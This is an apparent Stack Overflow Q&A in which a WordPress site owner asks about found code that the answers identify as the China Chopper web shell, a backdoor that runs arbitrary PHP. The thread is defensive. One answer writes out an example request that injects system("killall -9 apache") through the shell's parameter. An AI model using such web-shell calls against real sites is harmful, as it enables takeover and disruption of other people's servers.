问题
I found this code in one of my wordpress plugin site. I guess it can be used with malicious intent but what exactly it does and can I find out if it calls some other actions that I should be aware of?
回答1:
This PHP script belongs to China Chopper Hacking Kit.
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
回答2:
Yes, it is very bad. I can't imagine any situation where this code could exist as the part of a harmless software.
This code essentially allows to run any php code given by the pass get parameter. For example, calling this php as http://yoursite/your.php?pass=system("killall -9 apache"); will shot down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file. And later to get this temporary file back).
It is probably a backdoor, and probably not the only one. Your site needs a deep security check.
来源:https://stackoverflow.com/questions/32672027/found-php-eval-postpass-code-in-wordpress-site